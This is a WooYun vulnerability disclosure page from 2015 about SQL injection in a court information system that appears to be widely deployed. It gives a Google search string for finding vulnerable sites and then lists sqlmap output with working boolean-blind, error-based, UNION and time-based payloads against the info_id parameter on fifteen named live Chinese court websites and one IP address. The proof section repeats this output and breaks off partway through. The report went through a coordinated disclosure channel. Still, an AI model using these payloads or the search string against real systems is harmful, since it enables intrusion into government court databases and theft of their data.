某在用法院系统通用型注入 | wooyun-2015-0113942| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113942

漏洞标题：某在用法院系统通用型注入

漏洞作者：路人甲

提交时间：2015-05-14 10:13

修复时间：2015-08-17 08:16

公开时间：2015-08-17 08:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-14：细节已通知厂商并且等待厂商处理中
2015-05-19：厂商已经确认，细节仅向厂商公开
2015-05-22：细节向第三方安全合作伙伴开放
2015-07-13：细节向核心白帽子及相关领域专家公开
2015-07-23：细节向普通白帽子公开
2015-08-02：细节向实习白帽子公开
2015-08-17：细节向公众公开

简要描述：

通用型

详细说明：

谷歌关键字：inurl:showDetail.jsp?info_id=
ps：（sqlmap用windows版本跑。）Linux版会出现一些小问题。。

#1：http://www.mlfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=201309000467
sqlmap identified the following injection points with a total of 49 HTTP(s) requ
ests:
---
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=201309000467' AND 1627=1627 AND 'UkaE'='UkaE
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=201309000467' AND 5913=CONVERT(INT,(CHAR(58)+CHAR(114)+CHAR
(121)+CHAR(113)+CHAR(58)+(SELECT (CASE WHEN (5913=5913) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(98)+CHAR(102)+CHAR(104)+CHAR(58))) AND 'akzr'='akzr
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=201309000467' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHA
R(58)+CHAR(114)+CHAR(121)+CHAR(113)+CHAR(58)+CHAR(109)+CHAR(118)+CHAR(100)+CHAR(
114)+CHAR(102)+CHAR(106)+CHAR(107)+CHAR(84)+CHAR(86)+CHAR(113)+CHAR(58)+CHAR(98)
+CHAR(102)+CHAR(104)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=201309000467' WAITFOR DELAY '0:0:5'--
---
#2：http://www.lingaofayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000020201105
sqlmap identified the following injection points with a total of 54 HTTP(s) requ
ests:
---
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000020201105' AND 4372=4372 AND 'pLzv'='pLzv
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000020201105' AND 3158=CONVERT(INT,(CHAR(58)+CHAR(112)
+CHAR(116)+CHAR(118)+CHAR(58)+(SELECT (CASE WHEN (3158=3158) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(100)+CHAR(106)+CHAR(58))) AND 'uucC'='uuc
C
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=-4320' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(112)+CHAR(1
16)+CHAR(118)+CHAR(58)+CHAR(84)+CHAR(85)+CHAR(100)+CHAR(72)+CHAR(112)+CHAR(69)+C
HAR(106)+CHAR(70)+CHAR(114)+CHAR(100)+CHAR(58)+CHAR(112)+CHAR(100)+CHAR(106)+CHA
R(58),NULL,NULL,NULL,NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=XFLOW000020201105' WAITFOR DELAY '0:0:5'--
---
#3：http://sf.hicourt.gov.cn/sfpt/channel/showDetail.jsp?info_id=201309000467
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=201309000467' AND 3196=3196 AND 'QsNJ'='QsNJ
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=201309000467' AND 4760=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (4760=4760) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(114)+CHAR(119)+CHAR(113))) AND 'mYAY'='mYAY
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=201309000467' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(120)+CHAR(117)+CHAR(113)+CHAR(73)+CHAR(65)+CHAR(110)+CHAR(80)+CHAR(77)+CHAR(111)+CHAR(118)+CHAR(102)+CHAR(101)+CHAR(103)+CHAR(113)+CHAR(102)+CHAR(114)+CHAR(119)+CHAR(113),NULL-- 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=201309000467' WAITFOR DELAY '0:0:5'--
#4：http://www.xyfycourt.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000027201105
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000027201105' AND 1848=1848 AND 'gRxW'='gRxW
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000027201105' AND 9290=CONVERT(INT,(CHAR(58)+CHAR(100)
+CHAR(116)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (9290=9290) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(58)+CHAR(99)+CHAR(122)+CHAR(108)+CHAR(58))) AND 'RvQx'='RvQx
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=XFLOW000027201105' UNION ALL SELECT NULL,NULL,NULL,NULL,NUL
L,CHAR(58)+CHAR(100)+CHAR(116)+CHAR(112)+CHAR(58)+CHAR(108)+CHAR(73)+CHAR(72)+CH
AR(118)+CHAR(102)+CHAR(121)+CHAR(108)+CHAR(67)+CHAR(117)+CHAR(67)+CHAR(58)+CHAR(
99)+CHAR(122)+CHAR(108)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=XFLOW000027201105' WAITFOR DELAY '0:0:5'--
---
#5：http://www.lsfayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=201309000467
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=201309000467' AND 1179=1179 AND 'uzLK'='uzLK
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=201309000467' AND 8642=CONVERT(INT,(CHAR(58)+CHAR(117)+CHAR
(110)+CHAR(103)+CHAR(58)+(SELECT (CASE WHEN (8642=8642) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(112)+CHAR(121)+CHAR(112)+CHAR(58))) AND 'oKuu'='oKuu
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=201309000467' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHA
R(58)+CHAR(117)+CHAR(110)+CHAR(103)+CHAR(58)+CHAR(101)+CHAR(121)+CHAR(78)+CHAR(1
07)+CHAR(87)+CHAR(115)+CHAR(112)+CHAR(113)+CHAR(119)+CHAR(113)+CHAR(58)+CHAR(112
)+CHAR(121)+CHAR(112)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=201309000467' WAITFOR DELAY '0:0:5'--
---
#6：http://www.qionghaifayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000021201105
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000021201105' AND 5572=5572 AND 'izwn'='izwn
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000021201105' AND 4949=CONVERT(INT,(CHAR(58)+CHAR(117)
+CHAR(112)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (4949=4949) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(58)+CHAR(103)+CHAR(114)+CHAR(102)+CHAR(58))) AND 'TMrT'='TMr
T
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=XFLOW000021201105' UNION ALL SELECT NULL,NULL,NULL,NULL,NUL
L,CHAR(58)+CHAR(117)+CHAR(112)+CHAR(105)+CHAR(58)+CHAR(105)+CHAR(65)+CHAR(68)+CH
AR(72)+CHAR(89)+CHAR(99)+CHAR(77)+CHAR(97)+CHAR(80)+CHAR(84)+CHAR(58)+CHAR(103)+
CHAR(114)+CHAR(102)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: info_id=XFLOW000021201105' AND 3562=(SELECT 3562 FROM PG_SLEEP(5))
AND 'kDEH'='kDEH
---
[17:01:29] [INFO] the back-end DBMS is PostgreSQL
web application technology: JSP
#7：http://www.hndzfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000020201105
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000020201105' AND 1197=1197 AND 'GqXa'='GqXa
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000020201105' AND 6917=CONVERT(INT,(CHAR(58)+CHAR(105)
+CHAR(120)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (6917=6917) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(118)+CHAR(103)+CHAR(58))) AND 'DIoR'='DIo
R
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=-1609' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(105)+CHAR(1
20)+CHAR(112)+CHAR(58)+CHAR(67)+CHAR(66)+CHAR(76)+CHAR(103)+CHAR(118)+CHAR(113)+
CHAR(112)+CHAR(71)+CHAR(76)+CHAR(89)+CHAR(58)+CHAR(109)+CHAR(118)+CHAR(103)+CHAR
(58),NULL,NULL,NULL,NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=XFLOW000020201105' WAITFOR DELAY '0:0:5'--
---
#8：http://www.syzy.gov.cn/sfpt/channel/showDetail.jsp?info_id=SFDTP000001201503000651
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=SFDTP000001201503000651' AND 4899=4899 AND 'NiHn'='NiHn
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=SFDTP000001201503000651' AND 8619=CONVERT(INT,(CHAR(58)+CHA
R(110)+CHAR(110)+CHAR(107)+CHAR(58)+(SELECT (CASE WHEN (8619=8619) THEN CHAR(49)
 ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(103)+CHAR(110)+CHAR(58))) AND 'ZKfX
'='ZKfX
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=SFDTP000001201503000651' UNION ALL SELECT NULL,NULL,NULL,NU
LL,NULL,CHAR(58)+CHAR(110)+CHAR(110)+CHAR(107)+CHAR(58)+CHAR(122)+CHAR(115)+CHAR
(80)+CHAR(116)+CHAR(103)+CHAR(84)+CHAR(76)+CHAR(102)+CHAR(77)+CHAR(87)+CHAR(58)+
CHAR(109)+CHAR(103)+CHAR(110)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=SFDTP000001201503000651' WAITFOR DELAY '0:0:5'--
---
#9：http://sfpt.hkfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=SFDTP000762201504000609
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=SFDTP000762201504000609' AND 5622=5622 AND 'fGgY'='fGgY
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=SFDTP000762201504000609' AND 1174=CONVERT(INT,(SELECT CHAR(113)+CHAR(97)+CHAR(107)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (1174=1174) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(119)+CHAR(113))) AND 'szbV'='szbV
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=-8808' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(97)+CHAR(107)+CHAR(109)+CHAR(113)+CHAR(73)+CHAR(70)+CHAR(80)+CHAR(84)+CHAR(84)+CHAR(68)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(88)+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(119)+CHAR(113),NULL-- 
---
#10：http://www.baishafayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000023201105
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000023201105' AND 8000=8000 AND 'CNUK'='CNUK
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000023201105' AND 4613=CONVERT(INT,(CHAR(58)+CHAR(105)
+CHAR(97)+CHAR(101)+CHAR(58)+(SELECT (CASE WHEN (4613=4613) THEN CHAR(49) ELSE C
HAR(48) END))+CHAR(58)+CHAR(117)+CHAR(101)+CHAR(101)+CHAR(58))) AND 'jetN'='jetN
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=-5114' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(105)+CHAR(9
7)+CHAR(101)+CHAR(58)+CHAR(68)+CHAR(122)+CHAR(81)+CHAR(82)+CHAR(65)+CHAR(89)+CHA
R(118)+CHAR(73)+CHAR(116)+CHAR(107)+CHAR(58)+CHAR(117)+CHAR(101)+CHAR(101)+CHAR(
58),NULL,NULL,NULL,NULL--
---
#11：http://www.wzsfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000027201105
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000027201105' AND 3260=3260 AND 'umkV'='umkV
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000027201105' AND 7974=CONVERT(INT,(CHAR(58)+CHAR(122)
+CHAR(106)+CHAR(118)+CHAR(58)+(SELECT (CASE WHEN (7974=7974) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(114)+CHAR(116)+CHAR(58))) AND 'TxVi'='TxV
i
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=XFLOW000027201105' UNION ALL SELECT NULL,NULL,NULL,NULL,NUL
L,CHAR(58)+CHAR(122)+CHAR(106)+CHAR(118)+CHAR(58)+CHAR(118)+CHAR(104)+CHAR(113)+
CHAR(115)+CHAR(74)+CHAR(81)+CHAR(85)+CHAR(67)+CHAR(115)+CHAR(67)+CHAR(58)+CHAR(1
08)+CHAR(114)+CHAR(116)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: info_id=XFLOW000027201105' AND 7232=(SELECT 7232 FROM PG_SLEEP(5))
AND 'ZuUq'='ZuUq
---
#12：http://www.dongfangfayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000023201105
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000023201105' AND 4256=4256 AND 'aBMu'='aBMu
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000023201105' AND 3202=CONVERT(INT,(CHAR(58)+CHAR(104)
+CHAR(119)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (3202=3202) THEN CHAR(49) ELSE C
HAR(48) END))+CHAR(58)+CHAR(109)+CHAR(99)+CHAR(103)+CHAR(58))) AND 'whgB'='whgB
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=XFLOW000023201105' WAITFOR DELAY '0:0:5'--
---
#13：http://www.ypfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000023201105
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000023201105' AND 9147=9147 AND 'kicL'='kicL
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000023201105' AND 7570=CONVERT(INT,(CHAR(58)+CHAR(117)
+CHAR(122)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (7570=7570) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(58)+CHAR(118)+CHAR(104)+CHAR(104)+CHAR(58))) AND 'nvaU'='nva
U
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=-9483' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(117)+CHAR(1
22)+CHAR(100)+CHAR(58)+CHAR(100)+CHAR(65)+CHAR(81)+CHAR(82)+CHAR(115)+CHAR(70)+C
HAR(103)+CHAR(110)+CHAR(73)+CHAR(114)+CHAR(58)+CHAR(118)+CHAR(104)+CHAR(104)+CHA
R(58),NULL,NULL,NULL,NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=XFLOW000023201105' WAITFOR DELAY '0:0:5'--
---
#14：http://www.chengmaifayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=SFDTP000001201501000623
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=SFDTP000001201501000623' AND 2766=2766 AND 'yzBo'='yzBo
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=SFDTP000001201501000623' AND 1048=CONVERT(INT,(CHAR(58)+CHA
R(113)+CHAR(122)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (1048=1048) THEN CHAR(49)
 ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(107)+CHAR(107)+CHAR(58))) AND 'ouIj
'='ouIj
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=-1668' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(58)+C
HAR(113)+CHAR(122)+CHAR(114)+CHAR(58)+CHAR(72)+CHAR(76)+CHAR(105)+CHAR(68)+CHAR(
86)+CHAR(118)+CHAR(88)+CHAR(83)+CHAR(110)+CHAR(97)+CHAR(58)+CHAR(109)+CHAR(107)+
CHAR(107)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=SFDTP000001201501000623' WAITFOR DELAY '0:0:5'--
---
#15：http://112.67.253.202/sfpt/channel/showDetail.jsp?info_id=SFDTP000001201407000583
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=SFDTP000001201407000583' AND 6259=6259 AND 'XMNE'='XMNE
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=SFDTP000001201407000583' AND 1970=CONVERT(INT,(CHAR(58)+CHA
R(108)+CHAR(104)+CHAR(116)+CHAR(58)+(SELECT (CASE WHEN (1970=1970) THEN CHAR(49)
 ELSE CHAR(48) END))+CHAR(58)+CHAR(114)+CHAR(102)+CHAR(122)+CHAR(58))) AND 'VPKc
'='VPKc
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=-2453' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(58)+C
HAR(108)+CHAR(104)+CHAR(116)+CHAR(58)+CHAR(100)+CHAR(79)+CHAR(82)+CHAR(98)+CHAR(
75)+CHAR(102)+CHAR(103)+CHAR(121)+CHAR(75)+CHAR(113)+CHAR(58)+CHAR(114)+CHAR(102
)+CHAR(122)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=SFDTP000001201407000583' WAITFOR DELAY '0:0:5'--
---

漏洞证明：

谷歌关键字：inurl:showDetail.jsp?info_id=

#1：http://www.mlfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=201309000467
sqlmap identified the following injection points with a total of 49 HTTP(s) requ
ests:
---
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=201309000467' AND 1627=1627 AND 'UkaE'='UkaE
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=201309000467' AND 5913=CONVERT(INT,(CHAR(58)+CHAR(114)+CHAR
(121)+CHAR(113)+CHAR(58)+(SELECT (CASE WHEN (5913=5913) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(98)+CHAR(102)+CHAR(104)+CHAR(58))) AND 'akzr'='akzr
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=201309000467' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHA
R(58)+CHAR(114)+CHAR(121)+CHAR(113)+CHAR(58)+CHAR(109)+CHAR(118)+CHAR(100)+CHAR(
114)+CHAR(102)+CHAR(106)+CHAR(107)+CHAR(84)+CHAR(86)+CHAR(113)+CHAR(58)+CHAR(98)
+CHAR(102)+CHAR(104)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=201309000467' WAITFOR DELAY '0:0:5'--
---
#2：http://www.lingaofayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000020201105
sqlmap identified the following injection points with a total of 54 HTTP(s) requ
ests:
---
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000020201105' AND 4372=4372 AND 'pLzv'='pLzv
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000020201105' AND 3158=CONVERT(INT,(CHAR(58)+CHAR(112)
+CHAR(116)+CHAR(118)+CHAR(58)+(SELECT (CASE WHEN (3158=3158) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(100)+CHAR(106)+CHAR(58))) AND 'uucC'='uuc
C
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=-4320' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(112)+CHAR(1
16)+CHAR(118)+CHAR(58)+CHAR(84)+CHAR(85)+CHAR(100)+CHAR(72)+CHAR(112)+CHAR(69)+C
HAR(106)+CHAR(70)+CHAR(114)+CHAR(100)+CHAR(58)+CHAR(112)+CHAR(100)+CHAR(106)+CHA
R(58),NULL,NULL,NULL,NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=XFLOW000020201105' WAITFOR DELAY '0:0:5'--
---
#3：http://sf.hicourt.gov.cn/sfpt/channel/showDetail.jsp?info_id=201309000467
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=201309000467' AND 3196=3196 AND 'QsNJ'='QsNJ
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=201309000467' AND 4760=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (4760=4760) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(114)+CHAR(119)+CHAR(113))) AND 'mYAY'='mYAY
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=201309000467' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(120)+CHAR(117)+CHAR(113)+CHAR(73)+CHAR(65)+CHAR(110)+CHAR(80)+CHAR(77)+CHAR(111)+CHAR(118)+CHAR(102)+CHAR(101)+CHAR(103)+CHAR(113)+CHAR(102)+CHAR(114)+CHAR(119)+CHAR(113),NULL-- 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=201309000467' WAITFOR DELAY '0:0:5'--
#4：http://www.xyfycourt.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000027201105
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000027201105' AND 1848=1848 AND 'gRxW'='gRxW
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000027201105' AND 9290=CONVERT(INT,(CHAR(58)+CHAR(100)
+CHAR(116)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (9290=9290) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(58)+CHAR(99)+CHAR(122)+CHAR(108)+CHAR(58))) AND 'RvQx'='RvQx
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=XFLOW000027201105' UNION ALL SELECT NULL,NULL,NULL,NULL,NUL
L,CHAR(58)+CHAR(100)+CHAR(116)+CHAR(112)+CHAR(58)+CHAR(108)+CHAR(73)+CHAR(72)+CH
AR(118)+CHAR(102)+CHAR(121)+CHAR(108)+CHAR(67)+CHAR(117)+CHAR(67)+CHAR(58)+CHAR(
99)+CHAR(122)+CHAR(108)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=XFLOW000027201105' WAITFOR DELAY '0:0:5'--
---
#5：http://www.lsfayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=201309000467
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=201309000467' AND 1179=1179 AND 'uzLK'='uzLK
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=201309000467' AND 8642=CONVERT(INT,(CHAR(58)+CHAR(117)+CHAR
(110)+CHAR(103)+CHAR(58)+(SELECT (CASE WHEN (8642=8642) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(112)+CHAR(121)+CHAR(112)+CHAR(58))) AND 'oKuu'='oKuu
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=201309000467' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHA
R(58)+CHAR(117)+CHAR(110)+CHAR(103)+CHAR(58)+CHAR(101)+CHAR(121)+CHAR(78)+CHAR(1
07)+CHAR(87)+CHAR(115)+CHAR(112)+CHAR(113)+CHAR(119)+CHAR(113)+CHAR(58)+CHAR(112
)+CHAR(121)+CHAR(112)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: info_id=201309000467' WAITFOR DELAY '0:0:5'--
---
#6：http://www.qionghaifayuan.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000021201105
Place: GET
Parameter: info_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=XFLOW000021201105' AND 5572=5572 AND 'izwn'='izwn
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: info_id=XFLOW000021201105' AND 4949=CONVERT(INT,(CHAR(58)+CHAR(117)
+CHAR(112)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (4949=4949) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(58)+CHAR(103)+CHAR(114)+CHAR(102)+CHAR(58))) AND 'TMrT'='TMr
T
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: info_id=XFLOW000021201105' UNION ALL SELECT NULL,NULL,NULL,NULL,NUL
L,CHAR(58)+CHAR(117)+CHAR(112)+CHAR(105)+CHAR(58)+CHAR(105)+CHAR(65)+CHAR(68)+CH
AR(72)+CHAR(89)+CHAR(99)+CHAR(77)+CHAR(97)+CHAR(80)+CHAR(84)+CHAR(58)+CHAR(103)+
CHAR(114)+CHAR(102)+CHAR(58),NULL--
    Type: AND/OR time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: info_id=XFLOW000021201105' AND 3562=(SELECT 3562 FROM PG_SLEEP(5))
AND 'kDEH'='kDEH
---
[17:01:29] [INFO] the back-end DBMS is PostgreSQL
web application technology: JSP
#7：http://www.hndzfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=XFLOW000020201105
Place: GET
Parameter: info_id
    Type: boolean-based blind
